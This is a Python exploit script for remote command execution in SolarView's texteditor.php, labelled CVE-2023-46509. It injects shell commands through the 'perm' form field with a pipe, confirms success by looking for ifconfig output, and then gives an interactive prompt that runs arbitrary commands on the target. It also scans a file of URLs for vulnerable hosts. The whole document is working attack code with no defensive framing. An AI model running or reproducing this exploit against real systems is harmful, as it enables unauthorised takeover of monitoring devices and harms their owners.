import requests
import urllib3
import re
from urllib.parse import urljoin
import argparse
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

def read_file(file_path):
    with open(file_path, 'r') as file:
        urls = file.read().splitlines()
    return urls


def check(url):
    url = url.rstrip("/")
    taeget_url = urljoin(url, "/texteditor.php?save=save&w_delimit=crlf")
    try:
        headers = {
            "User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36",
            "Content-Type": "application/x-www-form-urlencoded",
        }
        data = """directory=%2Fhome%2Fcontec%2Fdata%2FoutputCtrl%2Fremote%2F2016%2F&w_charset=euc&newfile=&editfile=%2ftmp%2f6&contents=456&writable=1&chmod=on&perm=777%20/tmp|ifconfig||"""
        response = requests.post(taeget_url, verify=False, headers=headers, data=data, timeout=25)
        if 'eth0' in response.text and 'Bcast' in response.text:
            print("\033[31mDiscovered: solarView CVE-2023-46509 RCE:\033[0m")
            return True
    except Exception as e:
        pass


def run(url):
    url = url.rstrip("/")
    taeget_url = urljoin(url, "/texteditor.php?save=save&w_delimit=crlf")
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36",
        "Content-Type": "application/x-www-form-urlencoded",
    }
    try:
        if check(url):
            while True:
                command = input("\033[34mPlease input command (stop input:exit):\033[0m")
                if "exit" not in command:
                    data = """directory=%2Fhome%2Fcontec%2Fdata%2FoutputCtrl%2Fremote%2F2016%2F&w_charset=euc&newfile=&editfile=%2ftmp%2f6&contents=456&writable=1&chmod=on&perm=777%20/tmp|{}||""".format(command)
                    response_command = requests.post(taeget_url, verify=False, headers=headers, data=data, timeout=15)
                    match = re.search(r"</table>(.*?)</table>", response_command.text, re.DOTALL)
                    if match:
                        table_content = match.group(1)
                        clean_text = re.sub(r"<br>.*?</tr>", "", table_content, flags=re.DOTALL)
                        print(clean_text)
                else:
                    break
    except Exception as e:
        pass
if __name__ == "__main__":
    parser = argparse.ArgumentParser()
    parser.add_argument("-u", "--url", help="URL")
    parser.add_argument("-f", "--txt", help="file")
    args = parser.parse_args()
    url = args.url
    txt = args.txt

    if url:
        run(url)
    elif txt:
        urls = read_file(txt)
        for url in urls:
            check(url)
    else:
        print("help")
